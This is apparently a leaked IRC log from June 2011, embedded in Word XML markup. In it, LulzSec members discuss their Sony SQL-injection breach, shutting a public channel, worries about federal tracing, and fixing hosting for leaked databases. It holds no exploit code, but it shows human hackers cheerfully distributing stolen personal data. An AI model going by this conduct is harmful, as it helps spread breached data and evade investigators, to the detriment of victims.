        <w:t>Jun 02 18:23:45 joepie91 friend of mine just dropped too Jun 02 18:23:52 trollpoll perhaps is not a bad idea to leave 2600 ... Jun 02 18:23:58 storm perhaps Jun 02 18:24:00 Recursion as I said Jun 02 18:24:00 Topiary yeah let's chill somewhere else Jun 02 18:24:01 storm because for one Jun 02 18:24:03 Topiary everyone wanna leave?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:24:04 joepie91 strangely I dont ping out yet Jun 02 18:24:06 trollpoll feds will start searching ips of random users Jun 02 18:24:08 storm I'm not going to drop a ton of users Jun 02 18:24:09 Recursion dont interface with the public more than you need to Jun 02 18:24:17 storm to priotect a shit channel on shitty servers Jun 02 18:24:20 storm protect even Jun 02 18:24:21 storm although Jun 02 18:24:22 sabu look Jun 02 18:24:26 storm having a fanbase is fun Jun 02 18:24:30 sabu close channel Jun 02 18:24:33 sabu first Jun 02 18:24:36 sabu mod channel Jun 02 18:24:37 sabu +m Jun 02 18:24:49 storm done Jun 02 18:24:50 sabu let everyone know 2600 irc was temporary for meeting fans or whatever Jun 02 18:24:51 storm now what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:24:52 sabu see us on twitter Jun 02 18:24:58 sabu and just close the chan down Jun 02 18:25:04 sabu throw a crackhead bot in there and keep it moving Jun 02 18:25:08 neuron rgr Jun 02 18:25:14 sabu neuron let storm do it Jun 02 18:25:16 Recursion Neuron: did you start an AMA?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:25:16 joepie91 I think a server just died Jun 02 18:25:41 Topiary now we all leave Jun 02 18:25:43 Topiary everyone /part Jun 02 18:25:51 sabu yeah Jun 02 18:25:53 trollpoll thats it Jun 02 18:25:57 sabu no more public apperances Jun 02 18:26:00 sabu witohut us organizing it Jun 02 18:26:03 neuron left Jun 02 18:26:05 sabu thanks storm for holding it down Jun 02 18:26:05 trollpoll great Jun 02 18:26:13 sabu guys from now on Jun 02 18:26:22 storm done Jun 02 18:26:23 sabu if you are not familiar with these hostile environments Jun 02 18:26:25 neuron Few seocnds Jun 02 18:26:35 sabu don't partake in it Jun 02 18:26:38 storm SignOff hentrax: #lulzsec (Ping timeout: 240 seconds) Jun 02 18:26:38 storm SignOff home_keys: #lulzsec (Quit: Leaving) Jun 02 18:26:38 storm SignOff haraldo: #lulzsec (Quit: Leaving.) Jun 02 18:26:38 storm fancypants is now known as lessthanthree Jun 02 18:26:38 storm happyhour [~hehe@124-148-131-129.dyn.iinet.net.au] has joined #lulzsec Jun 02 18:26:38 storm SignOff Anonique88: #lulzsec () Jun 02 18:26:38 storm BlizWar [~kruppa@a88-112-133-232.elisa- laajakaista.fi] has left #lulzsec Jun 02 18:26:38 storm [] Jun 02 18:26:38 storm SignOff SL1CHAOS: #lulzsec () Jun 02 18:26:38 storm SignOff [KGB]Derungo: #lulzsec () Jun 02 18:26:39 storm rofl Jun 02 18:26:44 storm right after topic change Jun 02 18:26:55 neuron bwhaha Jun 02 18:26:58 storm and yeah guys Jun 02 18:26:59 storm btw Jun 02 18:27:03 sabu yeah bro?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:27:04 joepie91 [02:26:51] -=- nyannyan is now known as WANT2CHAT Jun 02 18:27:04 joepie91 [02:26:53] -=- BUT_WANT_TO_TRO is now known as WANT_TO_TROLL Jun 02 18:27:06 storm don't freak out over some packets Jun 02 18:27:08 storm you're all fine Jun 02 18:27:13 sabu yes Jun 02 18:27:14 storm that guy barely had 100mbps Jun 02 18:27:19 neuron haha yeah i wasn't worried :P Jun 02 18:27:20 joepie91 lol Jun 02 18:27:30 joepie91 btw Jun 02 18:27:31 storm i logged the ddos on my server in the .nl Jun 02 18:27:32 joepie91 madjack died Jun 02 18:27:33 joepie91 :P Jun 02 18:27:46 Recursion I was a magicjack.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:27:46 joepie91 so inb4 massive ping timeout/split Jun 02 18:28:10 storm whos bottle_of_rum Jun 02 18:28:18 trollpoll lol?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:28:20 storm he/she tried to evade my +mode Jun 02 18:29:20 joepie91 storm Jun 02 18:29:23 joepie91 that is not very usefuk Jun 02 18:29:27 joepie91 useful* Jun 02 18:29:35 joepie91 on a server where your host can be an unmasked ip Jun 02 18:29:36 joepie91 lol Jun 02 18:29:36 storm what?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:29:38 storm ./fuckem Jun 02 18:29:39 storm ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:29:44 joepie91 you banned a-z Jun 02 18:29:45 joepie91 in hostname Jun 02 18:29:50 storm i did a bitchx command Jun 02 18:29:52 storm called fuckem Jun 02 18:29:53 joepie91 if your host can be 1.2.3.4 that's not very useful Jun 02 18:29:55 joepie91 ah Jun 02 18:29:56 joepie91 fix it then Jun 02 18:29:56 joepie91 lol Jun 02 18:29:58 storm its not for looks its for lulz Jun 02 18:30:04 storm this server is no more Jun 02 18:30:06 storm relax.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 18:30:13 joepie91 you didnt ban everyone though Jun 02 18:30:14 joepie91 :P Jun 02 18:30:15 storm let me do my thing plox Jun 02 18:30:21 storm I didn't ban anyone Jun 02 18:30:28 joepie91 lololololol Jun 02 18:30:29 joepie91 split Jun 02 18:30:33 storm ye./ Jun 02 18:30:35 storm ye.* Jun 02 18:30:38 storm afk Jun 02 18:31:25 * pwnsauce (pwnsauce@HA-ntp.a04.d005o9.IP) has left #pure- elite Jun 02 18:32:29 neuron Sabu: Jun 02 18:32:39 storm txt me your number sabuzi Jun 02 18:32:41 storm i lost it Jun 02 18:32:47 storm bbl @g@in Jun 02 18:38:21 neuron 0-0\ Jun 02 18:38:23 neuron that was fun Jun 02 18:41:30 trollpoll ey guys, this is not a funeral xD Jun 02 19:03:22 * Sabu has quit (Ping timeout: 121 seconds) Jun 02 19:05:42 neuron p.s i didnt make a IAMA on reddit was a misunderstanding Jun 02 19:08:29 trollpoll well, i dont think this is a problem bigger than having a twitter account, or a webpage, but is important to know what to do with it Jun 02 19:08:47 neuron aye Jun 02 19:08:51 neuron were good Jun 02 19:11:36 * Palladium has quit (Quit: Lost terminal) Jun 02 19:12:02 Recursion I always wondered why lulzsec is hosted on same server as these sites: Jun 02 19:12:02 Recursion Found 4 domains hosted on the same web server as sale4gucci.com (111.90.139.155).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 19:12:02 Recursion lulzsecurity.com Jun 02 19:12:02 Recursion sale4gucci.com Jun 02 19:12:02 Recursion www.louisvuitton4bag.com Jun 02 19:12:57 neuron lol Jun 02 19:13:57 neuron bbiab Jun 02 19:18:00 * Neuron has quit (Ping timeout: 121 seconds) Jun 02 19:18:10 * Sabu (sabu@HA-v86.0ft.1icbev.IP) has joined #pure-elite Jun 02 19:18:19 * Sabu has quit (Connection closed) Jun 02 19:19:13 * Sabu (sabu@HA-06g.14k.jdcvo3.IP) has joined #pure-elite Jun 02 19:22:39 Recursion www.sale4gucci.com Jun 02 19:22:43 * Topiary has quit (Ping timeout: 121 seconds) Jun 02 19:22:43 Recursion also that Jun 02 19:23:17 Recursion Sabu: Jun 02 19:23:18 Recursion 16:12:06 &lt;@Recursion&gt; I always wondered why lulzsec is hosted on same server as these sites: Jun 02 19:23:18 Recursion 16:12:06 &lt;@Recursion&gt; Found 4 domains hosted on the same web server as sale4gucci.com (111.90.139.155).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 02 19:23:18 Recursion 16:12:06 &lt;@Recursion&gt; lulzsecurity.com Jun 02 19:23:18 Recursion 16:12:06 &lt;@Recursion&gt; sale4gucci.com Jun 02 19:23:18 Recursion 16:12:06 &lt;@Recursion&gt; www.louisvuitton4bag.com Jun 02 19:26:04 trollpoll this means that the host desnt ask about the web activity xDDD Jun 02 19:27:40 trollpoll night Jun 02 19:27:44 * trollpoll has quit (Quit: Leaving) Jun 02 19:30:15 sabu it hs nothing to do with us Jun 02 19:30:28 Recursion just saying brother Jun 02 19:59:55 * lol gives channel operator status to Sabu Jun 02 20:22:33 * Disconnected (Invalid argument).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>* * ** ENDING LOGGING AT Thu Jun 2 20:22:33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Fri Jun 3 13:15:48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13:15:48 * Now talking on #pure-elite Jun 03 13:15:48 * Topic for #pure-elite is: pE | Today we're having a meeting - stick around Jun 03 13:15:48 * Topic for #pure-elite set by Sabu!sabu@HA- 06g.14k.jdcvo3.IP at Fri Jun 3 09:41:46 2011 Jun 03 13:17:46 sabu jeaaa Jun 03 13:18:01 [redacted] chyeaaaa Jun 03 13:18:17 [redacted] so tell me about the new sony hack Jun 03 13:18:20 [redacted] and all the lulz i missed Jun 03 13:18:33 sabu we just dorpped what we had Jun 03 13:18:37 [redacted] oh Jun 03 13:18:41 sabu everyone went crazy for it Jun 03 13:18:42 sabu rofl Jun 03 13:18:44 [redacted] you mean with the coupons?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 13:18:57 [redacted] was it from that SQLi Jun 03 13:21:57 sabu yeah Jun 03 13:22:23 lol and @lulzsec now has more than 34,000 folowers xD Jun 03 13:23:07 sabu niceee Jun 03 13:25:14 joepie91 somehow Jun 03 13:25:18 joepie91 when you have to do something in a hurry Jun 03 13:25:21 joepie91 everything goes wrong Jun 03 13:25:26 joepie91 ._.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 13:27:45 sabu yeah Jun 03 13:28:07 joepie91 internet goes derp Jun 03 13:28:18 joepie91 filezilla raeps the master table or w/e it's called Jun 03 13:28:27 joepie91 notepad starts lagging my cpu for some reason Jun 03 13:28:28 joepie91 &gt;.&gt; Jun 03 13:42:06 tflow LOL Jun 03 13:42:07 tflow LOL Jun 03 13:42:07 tflow LOL Jun 03 13:42:14 tflow cloudflare = fucked up hardcore Jun 03 13:42:14 joepie91 ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 13:42:16 tflow http://www.searchdiscovered.com/?dn=INSERT%20INTO%20%60subdomains%60%20%28%60subdomain_name%60%29%20VALUES&amp;pid=5POXE2HY6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13:42:22 joepie91 that's not cloudflare Jun 03 13:42:22 tflow &gt;INSERT INTO 'subdomains' ('subdomain_name') Jun 03 13:42:23 joepie91 that is byethost Jun 03 13:42:24 joepie91 lol Jun 03 13:42:25 tflow i know Jun 03 13:42:31 tflow wel Jun 03 13:42:32 tflow yeah Jun 03 13:42:33 tflow it could be Jun 03 13:42:37 joepie91 it is :P Jun 03 13:42:42 tflow but when you go to the site it redirects to that Jun 03 13:42:45 joepie91 ye Jun 03 13:42:51 joepie91 because byethost could not find the file at first Jun 03 13:42:53 joepie91 thus redirected there Jun 03 13:42:55 joepie91 as "error page" Jun 03 13:43:05 joepie91 and cloudflare cached the redirect Jun 03 13:43:14 joepie91 but if you check the IP that shit is hosted on Jun 03 13:43:21 joepie91 you'll see it's byethost, not cf :) Jun 03 13:43:29 joepie91 byethost has like 61234612346 domains Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 Connecting lulzsecurity.com:80 Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 Connected Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 GET /releases/x_factor_contestants_database.sql HTTP/1.0 Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 Host: lulzsecurity.com Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 Cookie: __cfduid=db7dd1e6b9d039ee2820200b883a7ee291307121478 Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 Accept: */* Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 Pragma: no-cache Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 Cache-Control: no-cache Jun 03 13:45:41 joepie91 2011-06-03 19:45:12 Connection: close Jun 03 13:45:42 joepie91 2011-06-03 19:45:14 HTTP/1.1 404 Not Found Jun 03 13:45:43 joepie91 2011-06-03 19:45:14 Server: cloudflare-nginx Jun 03 13:45:44 joepie91 2011-06-03 19:45:14 Date: Fri, 03 Jun 2011 17:45:11 GMT Jun 03 13:45:45 joepie91 2011-06-03 19:45:14 Content-Type: text/html Jun 03 13:45:46 joepie91 2011-06-03 19:45:14 Connection: close Jun 03 13:45:47 joepie91 2011-06-03 19:45:14 Accept-Ranges: bytes Jun 03 13:45:48 joepie91 2011-06-03 19:45:14 Vary: User-Agent Jun 03 13:45:49 joepie91 2011-06-03 19:45:14 Cache-Control: public, proxy- revalidate Jun 03 13:45:50 joepie91 2011-06-03 19:45:14 X-Cache: MISS from demil1.byetcluster.com Jun 03 13:45:51 joepie91 2011-06-03 19:45:14 Via: 1.1 demil1.byetcluster.com:80 (Lusca/LUSCA_HEAD-r14756) Jun 03 13:45:52 joepie91 ;_; Jun 03 13:46:21 joepie91 byet gives a 404 Jun 03 13:46:34 * joepie91 calmly waits for files to propagate Jun 03 13:48:22 joepie91 Webspace:5632 MB Jun 03 13:48:23 joepie91 Disk space used0 MB Jun 03 13:48:23 joepie91 Disk Free 5632 MB Jun 03 13:48:23 joepie91 what Jun 03 13:48:33 joepie91 &gt;disk space used 0 Jun 03 13:49:17 joepie91 Bandwidth:204800 MB Jun 03 13:49:17 joepie91 Bandwidth used:481 MB Jun 03 13:49:17 joepie91 Bandwidth remaining:204319 MB Jun 03 13:49:19 joepie91 riight Jun 03 14:06:24 joepie91 mk Jun 03 14:06:28 joepie91 all sony links are working on this node Jun 03 14:06:30 joepie91 the rest is still broken Jun 03 14:08:01 tflow byethost is crewing up Jun 03 14:08:10 tflow one minute it works, next minute is redirects to portal Jun 03 14:08:33 tflow too many mood swings Jun 03 14:08:58 joepie91 tflow Jun 03 14:09:08 joepie91 as far as I know Cloudflare has a different cache for every node Jun 03 14:09:08 * virtual (virtual@HA-dfm.tk3.kjaj4b.IP) has joined #pure- elite Jun 03 14:09:23 &lt;virtual&gt; hi Jun 03 14:09:23 joepie91 that was why some people got errors when anonnews went down, while others could view an offline version Jun 03 14:09:28 &lt;virtual&gt; douh...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:09:31 * virtual is now known as trollpoll Jun 03 14:09:39 joepie91 thus, some nodes will have the redirect cached Jun 03 14:09:44 joepie91 while others have the actual files already Jun 03 14:09:48 joepie91 that is why I asked you to purge cache Jun 03 14:09:55 joepie91 so that all nodes will be forced to update their cache Jun 03 14:10:08 * tflow has quit (A TLS packet with unexpected length was received.) Jun 03 14:10:10 joepie91 .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:10:34 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 03 14:10:37 joepie91 wb Jun 03 14:10:43 joepie91 paste incoming Jun 03 14:10:45 joepie91 joepie91tflow Jun 03 14:10:45 joepie91 joepie91as far as I know Cloudflare has a different cache for every node Jun 03 14:10:45 joepie91 joepie91that was why some people got errors when anonnews went down, while others could view an offline version Jun 03 14:10:45 joepie91 joepie91thus, some nodes will have the redirect cached Jun 03 14:10:45 joepie91 joepie91while others have the actual files already Jun 03 14:10:45 joepie91 joepie91that is why I asked you to purge cache Jun 03 14:10:45 joepie91 joepie91so that all nodes will be forced to update their cache Jun 03 14:10:50 tflow ye, saw Jun 03 14:10:53 tflow hey trollpoll Jun 03 14:11:01 trollpoll eyyy tflow !</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:11:08 joepie91 but ye, a purge cache should solve everything Jun 03 14:11:29 tflow the problem isn't @ cloudflare Jun 03 14:11:32 tflow it's @ bytehost Jun 03 14:11:35 tflow i tried with tamper data Jun 03 14:11:39 trollpoll i saw the opiran leak Jun 03 14:11:40 joepie91 it isn't...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:11:40 tflow it redirected to the portal page Jun 03 14:11:44 joepie91 you cannot force a reload Jun 03 14:11:46 tflow even with the lulzsec domain Jun 03 14:11:51 tflow trust me Jun 03 14:11:52 tflow it is Jun 03 14:11:54 joepie91 ..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:11:55 trollpoll the emails came to us from an anonymous source? Jun 03 14:12:01 tflow if you connect directly to byethost Jun 03 14:12:07 sabu crazy trolllpoll Jun 03 14:12:10 tflow then you'll get the portal Jun 03 14:12:10 joepie91 how are you directly connecting to byethost Jun 03 14:12:16 trollpoll i hope not...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:12:19 joepie91 ohfuck Jun 03 14:12:21 joepie91 ..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:12:22 tflow typing in the ip + modifying host header Jun 03 14:12:27 joepie91 eh Jun 03 14:12:33 joepie91 I am not sure how the byethost dns works.. Jun 03 14:12:36 joepie91 er Jun 03 14:12:37 joepie91 network* Jun 03 14:12:42 joepie91 they have server clusters Jun 03 14:12:45 joepie91 so that may be an issue Jun 03 14:12:52 tflow true Jun 03 14:12:54 joepie91 that you are sending a request to a server that is not supposed to handle the request Jun 03 14:13:02 joepie91 can you add multiple A records in cloudflare? Jun 03 14:13:13 tflow i think so Jun 03 14:13:16 tflow why?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:13:22 tflow also Jun 03 14:13:34 tflow ns1.byet.org resolves lulzsec to a different i Jun 03 14:13:35 tflow ip Jun 03 14:13:40 tflow ns1-5 Jun 03 14:13:45 tflow which do not work at all Jun 03 14:13:53 tflow so i'm simply using the ip of byethost14.com Jun 03 14:14:03 tflow even though that's not the listen ip for lulzsec in their nameservers Jun 03 14:14:04 joepie91 mm Jun 03 14:14:05 joepie91 1 sec Jun 03 14:14:25 tflow listed* Jun 03 14:18:10 joepie91 tflow Jun 03 14:18:13 joepie91 point it to 209.51.196.244 Jun 03 14:18:24 joepie91 I modified my hosts file Jun 03 14:18:28 joepie91 and if I set it to that Jun 03 14:18:29 joepie91 it works Jun 03 14:18:33 tflow are you sure Jun 03 14:18:39 tflow let me try Jun 03 14:19:57 tflow doesn't work here Jun 03 14:20:24 joepie91 WTF.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:20:30 joepie91 byethost.com Jun 03 14:20:30 joepie91 This account is currently suspended.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:20:30 joepie91 It appears that this account's free hosting quota has been fully used! We would highly recommend upgrading your account here : Securesignup.net , then create a ticket at http://byet.org/premiumsupport requesting the free hosting account to be migrated to the new paid account. Jun 03 14:20:45 tflow ..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:20:47 tflow where's that?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:20:53 joepie91 on login Jun 03 14:20:53 joepie91 idk Jun 03 14:20:57 joepie91 k sec Jun 03 14:21:10 tflow what quota .__.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:21:24 joepie91 I have no clue Jun 03 14:21:29 joepie91 http://zymic.com/ Jun 03 14:21:33 joepie91 sign up there Jun 03 14:21:37 joepie91 it's what opmetalgear uses as well Jun 03 14:21:41 * joepie91 sighs Jun 03 14:21:55 joepie91 it's probably best to let byethost rest for now Jun 03 14:22:01 joepie91 or it'll become hours of troubleshooting Jun 03 14:24:30 tflow ugh Jun 03 14:24:33 tflow don't worry Jun 03 14:24:39 tflow i have somewhere to host it now Jun 03 14:24:43 joepie91 ah Jun 03 14:24:51 * joepie91 shoots Murphy Jun 03 14:33:43 joepie91 these people...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:33:44 joepie91 @chuckuf Jun 03 14:33:45 joepie91 Charles Farley Jun 03 14:33:45 joepie91 trying to get to lulzsecurity.com via various Tor exit nodes appear to be blocked by the host due to being a 'spam bot'. Jun 03 14:33:48 joepie91 honestly Jun 03 14:33:52 joepie91 if you are "blocked" Jun 03 14:34:00 joepie91 you pretty much get a "fill in captcha to continue" Jun 03 14:34:01 joepie91 in your face Jun 03 14:34:10 joepie91 how can you even have the misconception that you are completely blocked :| Jun 03 14:35:43 joepie91 LOL Jun 03 14:35:44 joepie91 http://twitter.com/#!/tpb Jun 03 14:35:52 joepie91 @tpb Jun 03 14:35:52 joepie91 The Pirate Bay Jun 03 14:35:52 joepie91 Sony Hacked Again, Account Data Posted to the Pirate Bay: LulzSec, aka the Lulz Boat, compromised the personal d... http://bit.ly/mn3Q3x Jun 03 14:36:02 joepie91 moaaarrrr publicity Jun 03 14:36:45 sabu oh boyy Jun 03 14:38:57 trollpoll twitter account of lulzsec has more than 35.000 followers O_O... craziness...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:39:48 trollpoll is close to pass @sony :) Jun 03 14:40:02 joepie91 @pytey Jun 03 14:40:02 joepie91 pytey Jun 03 14:40:02 joepie91 If I wasn't married I'd like to have @LulzSec as my girlfriend.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:45:24 joepie91 LOL Jun 03 14:45:25 joepie91 Sabu Jun 03 14:45:27 joepie91 @Jake_W Jun 03 14:45:27 joepie91 Jake Walker Jun 03 14:45:27 joepie91 I wonder if @Sony's ever tried Microsoft Security Essentials? It's free and probably an upgrade over their current security measures.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 14:45:36 sabu ROFL Jun 03 14:45:43 sabu absurd hahhaha Jun 03 14:45:46 joepie91 retweet that lol Jun 03 14:45:59 sabu tell topiary Jun 03 14:46:03 joepie91 Topiary DING Jun 03 14:46:09 Topiary ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
